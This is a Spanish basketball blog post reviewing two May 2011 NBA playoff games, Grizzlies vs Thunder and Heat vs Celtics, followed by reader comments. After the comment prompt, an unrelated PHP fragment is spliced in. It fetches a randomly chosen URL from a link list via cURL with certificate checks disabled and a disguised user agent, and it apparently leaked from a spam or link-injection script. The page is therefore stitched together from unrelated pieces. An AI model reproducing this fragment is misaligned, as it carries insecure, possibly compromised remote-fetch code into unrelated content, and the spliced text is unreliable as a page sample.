Playoffs (01/05/2011): La garra del Grizzly

02 de May de 2011 por TheDeerHunter

Asistimos atónitos a una transformación. Nos hemos hartado de ridiculizar a una franquicia crónicamente perdedora. Los “ositos amorosos” les llamábamos. Hace años consideramos idiota a Chris Wallace, aquel GM “idiota” que hizo felices a la poblada afición Laker en uno de los traspasos a priori más absurdos de la historia de la competición. ¿O no lo fue tanto? De aquellas lluvias vienen estos lodos y el osito ha crecido hasta convertirse en el terrorífico oso pardo norteamericano. Cuidado con ellos.

Los Thunder anoche lo sintieron en sus carnes como previamente lo habían sentido los Spurs, primeros clasificados del oeste. Lejos de salir acobardados en cancha ajena, los Grizzlies salieron a campo abierto, al intercambio de golpes contra un equipo ofensivamente demoledor. No podría parecer peor idea inicialmente. El caso es que el planteamiento pilló a pie cambiado a Brooks y a sus pupilos quienes veían que a pesar de ver aro con fluidez y tener a Durant en estado de gracia, cada vez iban más por detrás en el marcador. Marc Gasol era el yunque y Zach Randolph el martillo. Incluso ante dos excelentes defensores como Perkins e Ibaka los Grizzlies hicieron por dentro lo que les vino en gana.

La otra variable de la ecuación, Westbrook, tuvo un debut agridulce. Dulce mirando aro pero terrible en la dirección. Los Thunder perdieron 18 balones, 7 de ellos su base all-star, tantos  como todo el equipo rival al completo. Así es muy complicado. Seguramente los defensores Grizzlies disfrutarían de menores facilidades para robar si los pases fueran menos previsibles. Entre Durant, Westbrook e Ibaka lanzaron el 75% de los tiros. Por este lado se echó especialmente de menos la participación de Harden, entre otros. Los Grizzlies se ponen en cabeza y los Thunder están contra las cuerdas (114-101). En San Antonio ya saben lo que es intentar dar la vuelta a la tortilla contra ellos.

Posteriormente asistimos al primer partido de la serie Heat vs Celtics. Pedazo de menú teníamos ayer tarde. Fue bastante más feo que el anterior. Mucho más táctico, pero también más tenso y más propio de la postemporada. Los Celtics entraron con muy mal pie a la eliminatoria. Pésimo ataque y una de las peores defensas que se ha visto con Doc Rivers al mando. La primera parte, además del desacierto verde, estuvo muy condicionada por los problemas de faltas de Rajon Rondo. Sólo se pudo rescatar el acierto de Ray Allen hasta el descanso. Wade destrozó igual que lo hiciera el año pasado. La diferencia anoche fue, cómo no, la presencia de LeBron… pero también la de James Jones, que estuvo inmenso. Fue el artífice de la cómoda ventaja al descanso. Los subcampeones fueron mejorando su ataque en la segunda parte pero no llegaron a fijar el ritmo en defensa. Pierce parecía despertar pero terminó expulsado por doble técnica. Los Heat se limitaron a controlar el resultado y dejar pasar el tiempo. A pesar de todo los Celtics no llegaron a perder la cara en ningún momento. Lo más normal hubiera sido haberse ido al hotel con una paliza en el bolsillo (90-99).

PREMIOS

MVP: Dwyane Wade le endosó 38 punto a la mejor defensa de la liga y además repartió 5 asistencias. Sin embargo la parejita interior de los Grizzlies dio honor al nombre de la franquicia cerrando un partido con 54 puntos, 23 rebotes, 6 asistencias, 3 tapones y 3 robos entre Zach y Marc. 21 de 33 en tiro. Surge la duda sobre si esta es la mejor pareja interior que queda o es la de los Lakers. Lo mismo aún podemos comprobarlo.

Sorpresa: James Jones amasó la diferencia que valió el partido antes del descanso. En total logró 5-7 en triples y 10-10 en tiros libres. Eso sí, jamás he visto defender tan mal a Ray Allen.

Decepción: 3-10 Rondo y 3-9 Garnett. Del banco mejor ni hablamos. Al poker de tréboles le faltaron dos piezas para ser ganador.

Esfuerzo en vano: Otro partido mítico de Kevin Durant, que en esta ocasión se va al limbo. 33 puntos, 11 rebotes, 3 asistencias, 1 robo y 2 tapones… Pero impotente en la derrota.

Comenta

7 comentarios a esta entrada

  1. Antoine Doinel dice:
    #1

    Típico arbitraje casero en la cancha de los Heat…
    En fin, esto no ha acabado, con un partido horrendo y 9 abajo. Veremos el siguiente, después de la bronca de Doc.

      Citar

  2. Vader dice:
    #2

    Me parece que la defensa de los Heat provoca partidos horrendos a mas de uno… Veremos si Shaq vuelve al rescate. Ahora mismo veo a Miami en la final de la NBA y yo era de los que no apostaba por ellos este año.

    Saludos

    PD: que grandes los Osos, y cuidado que yo creo quw con Rudy Gay pueden ser aun mejores.

      Citar

  3. manuu dice:
    #3

    Para arbitraje casero el del Oklahoma-Memphis, menudas faltitas les regalaron a los Thunder. Los Ositos tremendos, todos los jugadores aportando y Randolph sublime. Westbrook 9 de 23 en tiros de campo y 7 pérdidas, corriendo por la cancha como pollo sin cabeza.
    Y los Heat se llevaron el primer punto sin demasiado sufrimiento, James Jones mató el partido en el segundo cuarto con dos triples seguidos y en ningún momento dio la impresión de que peligrara su victoria, mucho tienen que mejorar los Celtics si quieren eliminar a los Lebron, Wade y compañía.

      Citar

  4. Javijaen dice:
    #4

    Es cierto que el arbitraje fue casero en ambos partidos, pero es el típico que te encuentras en PO. Pese a todo, el mal partido de Celtics fue debido en su mayoría al acierto defensivo de Heat, con Bibby volviendo a Rondo loco desde el inicio. Varias claves del partido: James Jones anuló a “nofallountriple” Allen en cuanto a aportación, Lebron-Bosh estuvieron flojos, al igual que Garnett-Pierce, e Ilgauskas horrible. La diferencia fue Wade, y lo que no entendí fue el poco tiempo que Jermaine O´Neil estuvo en cancha, ya que sus minutos fueron bastante buenos y los de Davis mediocres. Por cierto, de nuevo West en un lío, y me divertí con la exclusión de Pierce… El banquillo de Celtics, para hacerselo mirar…
    Y de los Osos (ya no Ositos) a destacar como secaron a Westbrook totalmente. Durant en su línea pero Randolph se salió, y Marc y compañía hicieron lo suyo para que meter una canasta a Thunder fuera una osadía. Aposté por Oklahoma, pero quizá me equivoqué por mucho. Ya veremos…

      Citar

  5. Ru dice:
    #5

    Tremenda defensa de los Heat en la primera parte,36 puntos si no me equivoco permitieron a los verdes,gustando a la afición del American Airlines con un Wade sublime.Excelentes en el corte de las líneas de pase y con desplazamientos rapidísimos en las ayudas.Pierce parecía darle emoción al partido en el tercer cuarto,donde la actitud defensiva no fue la misma pero fue en vano,aún rescatando lo que remarca el artículo “Lo más normal hubiera sido haberse ido al hotel con una paliza en el bolsillo”…otro equipo sin el orgullo verde seguro que hubiera tirado el partido.

      Citar

  6. Antoine Doinel dice:
    #6

    Está claro que es el típico arbitraje casero de PO, nada fuera de lo habitual, no estoy justificando la derrota ni mucho menos. Creo que Rondo se ofuscó y subestimó a Bibby (yo también lo habría hecho). Al mismo tiempo, Wade estuvo imparable. No sé quien puede frenarle. Tony Allen? Oh, wait…
    Los Celtics tienen que implicar al banquillo, hacer que Wade y Lebron vean el aro pequeño y controlar las pérdidas si quieren hacer algo más que llevarse un 4-2.

    Y lo de los Grizzlies ya empieza a ser de traca. Vaya defensa, vaya ataque, son un equipo que dan una sensación de solidez brutal. Si su pareja interior siguen a este nivel, OCK lo va a tener difícil; ayer con un Durant como siempre y un Westbrook un poco por debajo de la habitual ya se llevaron una tunda. Si los secundarios no se aplican, se van a ir prontito para casa.

      Citar

  7. GreenPride dice:
    #7

    Bueno pues la primera jornada de las eliminatorias de verdad empezó con una gran victoria de los Grizzlies en Oklahoma. Antes de la eliminatoria se suponía que Marc&Zach iban a tener problemas en ataque ante Perkins-Ibaka-Mohammed pero en este primer partido se los comieron con patatas los 2. Empezó siendo una exhibición de Z-Bo metiéndolas de todos los colores y en el tercer cuarto un impresionante Marc le tomó el relevo. Esto junto a la asfixiante defensa y el descubrimiento de hacer a Battier postear en ataque pusieron por delante a Memphis que la verdad nos está sorprendiendo a todos. Por los Thunder fenomenal de nuevo Durant pero Westbrook no parece ser el base que les vaya a llevar adelante en estos playoffs. Demasiadas pérdidas y tiros forzados que perjudican a su equipo. Quizás la culpa no sea sólo suya ya que a parte de él y Durant, sólo Ibaka parece mentalizado para aportar en ataque. Necesitarán más aportes del resto (Harden, Cook, Sefolosha) para dar la vuelta al tema.
    Luego llego el gran partido Heat-Celtics dominado por los Heat de forma bastante clara. Bibby secó de inicio a Rondo que además cometió rápidas personales lo que cortó el ritmo ofensivo de los verdes. Eso junto a un gran Wade y que a los Heat les entraban los triples les hizo irse en el marcador. En la segunda parte se vió bastante mejora de los Celtics, que por momentos amenazaron con remontar el marcador aunque nunca llegaron a estar a punto de hacerlo. Cuando más interesante estaba el partido la expulsión de Pierce frenó a los Celtics y allanó el camino a los Heat (aunque probablemente hubieran ganado tambien con Paul en juego). Que te expulsen a un jugador por dos encontronazos que son técnicas dobles no lo veo muy justo y más la segunda. Veremos si vuelve Shaq, si los verdes pueden devolver el golpe y si a los Heat les siguen entrando los triples, lo que es clave para que James y Wade puedan seguir penetrando. Además Garnett deberá subir su aportación y mejorar el banquillo verde si quieren poder hacer algo en la eliminatoria.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>